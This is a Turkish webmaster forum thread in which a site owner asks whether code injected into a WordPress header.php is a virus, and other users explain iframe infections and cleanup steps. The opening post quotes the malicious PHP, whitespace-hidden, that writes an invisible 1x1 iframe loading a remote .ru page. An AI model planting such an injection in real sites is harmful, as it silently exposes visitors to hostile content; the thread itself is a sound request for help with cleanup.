Bu codlar virus kodumu?

Googlede sitem bu site sisteminize zarar verebilir uyarısı verdikten sonra biraz araştırdım ve Bu aşağıdaki kodu header.php de buldum sitemi sitecheck.securi sitesinde tarattım ve bana yol olarak her ne kadar user.css ve jquary-akordion-menu/skin.php yi göstersede ben header.php içinde aşağıdaki kodları buldum. Çünkü sitecheck.securi ve google sağlık analizinde çıkan kodlar bu kodlardı. Sizce virusmu bu yoksa 1 defaya mahsus mu yerleşmiş eklenti sonucu. Dün ağırlıklı olarak 10 defa aynı eklenti olan uğur un açmış olduğu konudaki Better Google Sitemaps Generatör yüklemiştim.
Bunun geldiği ana bir dosya varmıdır. CSS içinde falan.

<?
#744345#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var txk = document.createElement('iframe');    txk.src = 'http://ivkikcop.ru/count9.php';    txk.style.position = 'absolute';    txk.style.border = '0';    txk.style.height = '1px';    txk.style.width = '1px';    txk.style.left = '1px';    txk.style.top = '1px';    if (!document.getElementById('txk')) {        document.write('<div id=\'txk\'></div>');        document.getElementById('txk').appendChild(txk);    }})();</script>";

#/744345#
?>

evet siteyi iframe ile görünmeyecek şekilde açıyor.

Evet derken virüsmü yani headerdan sildim o kodu vede ftp programını kaldırdım AppData danda Roaming klasöründeki şifrelerimin kayıtlı olduğu yeride sildim. Tedbir amacı ile. Bunun kafamda takıntı olmasını istemiyorum yarın bir gün her yeri sara diye korkuyorum.

iframe virüsü temizledikten sonra ftp cpanel gibi şifrelerinizi değiştirin, bilgisayarınızın temiz olduğunada emin olun bir problem olmaz.

Bu bir eklenti ile gelmiş olma ihtimali varmı acaba ilk defa bu gün karşılaştım sadece jquery akordion menü ile birde Better Google Sitemps eklentisi kurmuştum.
Ayrıca
Google webmaster dan yaptığım temizlikten sonra sitemdeki hata kodu halen görüküyor ve bende inceleme talebinde bulun tuşuna tıkladım "Talebiniz kabul edildi. Daha sonra Tekrar kontrol edin ' Yani bu talep kabulünden ne kadar süre sonra temizliğini kontrol etmemiz gerekiyor. Çünkü halen Zararlı yazılım taratmaya tıkladığımda , aynı hatayı alıyorum.

Bir çok eklenti gizlice birşeyler çalıştırıyor. En bilindik hiç ummadığınız bir benzer yazılar eklentisi display: none ile gizli link ekliyor mesela.

Dikkatli olmak lazım.

Yapman gereken olay şu tüm ftp dosyalarını indirip ki eklenti dosyalarına da bulaşmıştır büyük ihtimalle, hepsini temizlemek ve sonrasında ftp şifreni değiştirip dosyaları tekrardan atmak.

Eklenti ile gelmesi büyük olası, eklentileri wordpress.org den indirmenizi tavsiye ediyorum. Ancak eklenti ile gelmemiş de olabilir, herşey mümkün sonuçta.

Kolay gelsin.

Ben eklentilerin tümünü genelde sitemdeki eklenti yükleden indiriyorum .
FTP dosyalarının hepsini derken public_html nin tamamımı yoksa orda bir kaç zımbırtı daha var cpanel ana dizininde onlarda inecekmi. Ayırca public html yi tamamen çektim pc ye oradakini sildim. Ftp programınıda sildim. Bu klasörü ne ile taratmam lazım temizlik için. İframelerin hepsini silemem zaten sitem affialite reklamı yapıyor bütün bannerlar iframe bir kaç site sayfamda iframe den oluşuyor. Ancak o iframe lerden virus gelmez sağlam siteler çünkü.

Şimdi hocam public deki dosyaları çekip temizlediysen ftp şifreni temizlediysen ki en çok full sürüm deyip cracklenmiş şekilde kullanılan ftp programlarından geliyor. Ben flashfxp kullanıyorum ama full sürüm değil ftp programınıda kendi sitesinden indirip kurarsan bu sıkıntıyı çözmüş olursun. Herhangi bir program ile taratmana gerek yok dreamweaver var ise tüm dosya içerisinde <? # şeklinde arat sana bu kodun yazıldığı tüm sayfalar çıkacak ve onları değiştir kayıt et o şekilde ftp şifreni değiştirdikden sonra ftp ye yolla.

Bu kadar başka bir şey yapmana gerek yok.
kolay gelsin